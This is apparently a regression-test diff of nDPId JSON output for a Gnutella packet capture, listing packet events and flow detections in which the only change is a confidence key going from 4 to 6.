00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0sAAEAGN+GOhKUNCgACD3dmxIwAqPIB4YpKRGAS\/\/\/+CQAAAgQFtA=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0wAAEAGSwNNOtM0CgACDw7exHgAqewBNESdzWAS\/\/\/ZhQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":90767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90767,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxkxAAIAG9OIKAAIPjoSlDcSMd2bhikpEAKjyAlAQ+vAa1gAA"} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":90768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90768,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoHOhAAIAGsWoKAAIPTTrTNMR4Dt40RJ3NAKnsAlAQ+vD2UQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":90768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90768,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA04AAEAG9E3Co7R+CgACDypJxJAAquYBYmFhZWAS\/\/97mQAAAgQFtA=="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSs1AAIAGLNIKAAIPwqO0fsSQKkliYWFlAKrmAlAQ+vCYZQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1AAAEAGZwW5u0qtCgACD9DxxI8Aq+ABnMSfU2AS\/\/\/VWAAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1EAAEAG4wi8pcu+CgACD1XrxI0ArNoBciGOTGAS\/\/8ODwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoOIRAAIAGsdQKAAIPubtKrcSP0PGcxJ9TAKvgAlAQ+vDyJAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxP5AAIAGoV4KAAIPvKXLvsSNVetyIY5MAKzaAlAQ+vAq2wAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1UAAEAGyRlYeEnXCgACD1\/yxH8ArdQBY7MtEWAS\/\/9f0wAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1YAAEAGK3HBIH7WCgACD+jMxI4Ars4ByU6XnmAS\/\/9vGAAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo+\/1AAIAGUHQKAAIPWHhJ18R\/X\/Jjsy0RAK3UAlAQ+vB8nwAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1cAAEAGVX5o7qz6CgACD1v8xIgAr8gBAIGaT2AS\/\/\/yGAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoYpBAAIAGTDoKAAIPwSB+1sSO6MzJTpeeAK7OAlAQ+vCL5AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":90777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90777,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBk9AAIAG0okKAAIPaO6s+sSIW\/wAgZpPAK\/IAlAQ+vAO5QAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA14AAEAG805VqCJpCgACD5vkxIAAsMIB8fB5WWAS\/\/+FlQAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA18AAEAG3PlXezbqCgACD9NyxH0AsbwBqI15YWAS\/\/+HEAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3DZAAIAGmnkKAAIPVagiacSAm+Tx8HlZALDCAlAQ+vCiYQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90785,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2AAAEAGnkMzRJnWCgACD2aNxJMAsrYBwo+\/QmAS\/\/9bRgAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAooEJAAIAGwBkKAAIPV3s26sR903KojXlhALG8AlAQ+vCj3AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoeOBAAIAGqMYKAAIPM0SZ1sSTZo3Cj79CALK2AlAQ+vB4EgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 